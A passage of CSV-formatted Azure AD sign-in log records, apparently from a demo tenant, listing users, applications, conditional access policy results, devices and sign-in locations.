'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:36,"{'operatingSystem': 'Windows 10', 'deviceId': 'e13209ab-3ad5-4902-9922-f9751fc57345', 'browser': 'Chrome 80.0.3987', 'displayName': 'Itay-Surface', 'isCompliant': True, 'trustType': 'Azure AD joined', 'isManaged': True}",3dc3c81e-fee3-494a-96e7-8046af902000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.7778205871582, 'latitude': 32.066158294677734}, 'state': 'Tel Aviv', 'city': 'Tel Aviv-Yafo'}",none,none,none,none,[],{'errorCode': 0},Itay Argoety,2a2efcf8-e871-441d-bcc9-b58e88aff769,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,3dc3c81e-fee3-494a-96e7-8046af902000,SigninLogs,Sucess,32.06615829,34.77782059
+7,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:33.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,aa1debbe-7f66-4eff-aa2f-f6cf7d6ffc83,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,DZ,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:58,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",b125da47-83a8-4791-90e4-983bad130600,,,"{'countryOrRegion': 'DZ', 'geoCoordinates': {'longitude': 3, 'latitude': 28}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,b125da47-83a8-4791-90e4-983bad130600,SigninLogs,Sucess,28,3
+8,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:55.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f7976454-791a-4015-b043-fd06ae65c894,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",c6df9c5c-6712-4175-a3db-58ce9f3b0800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c6df9c5c-6712-4175-a3db-58ce9f3b0800,SigninLogs,Sucess,36.6404686,-78.26995087
+9,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:30.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,169892fb-8bed-4a71-9ded-eb0a44d35d16,Microsoft.aadiam,Microsoft.aadiam,,Jordan Ross,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 21:55,"{'operatingSystem': 'Windows 10', 'deviceId': '16377263-6c6e-4b1f-8679-1902a5731dc6', 'browser': 'Edge 81.0.416', 'displayName': 'MININT-E8D2OM5', 'isCompliant': True, 'trustType': 'Hybrid Azure AD joined', 'isManaged': True}",e960b628-b270-4a02-8866-d5e9fd9c0200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.16507720947266, 'latitude': 47.061771392822266}, 'state': 'Washington', 'city': 'Orting'}",none,none,none,none,[],{'errorCode': 0},Jordan Ross,d333c1f2-e2a3-4f8f-8370-35c29b543c62,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,e960b628-b270-4a02-8866-d5e9fd9c0200,SigninLogs,Sucess,47.06177139,-122.1650772
+10,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:45.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b1975a30-ad49-4c41-838b-03fcc4b8ce20,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 17:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",cbc0f99c-7bef-40f5-9b26-c77df96d1700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,cbc0f99c-7bef-40f5-9b26-c77df96d1700,SigninLogs,Sucess,33.7984581,-84.38828278
+11,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:00.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,99c7ba19-aa66-4d83-97fa-4d9ba81876d1,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 02:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",5fa972fe-7fa8-4b4b-bbdd-e602e74e0900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,5fa972fe-7fa8-4b4b-bbdd-e602e74e0900,SigninLogs,Sucess,36.6404686,-78.26995087
+12,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,11:29.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d27a20f0-89eb-4f7d-b380-cb35cf77f904,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:11,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",5f11d930-41ca-43a7-b362-f3ce6a9c0c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,5f11d930-41ca-43a7-b362-f3ce6a9c0c00,SigninLogs,Sucess,41.90428925,-85.99833679
+13,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,42:14.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,09f3bb3a-8439-4ad4-9a36-d7e34b442031,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:42,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",3a4d127f-5a89-4252-9f54-d79d91cc1000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,3a4d127f-5a89-4252-9f54-d79d91cc1000,SigninLogs,Sucess,33.7984581,-84.38828278
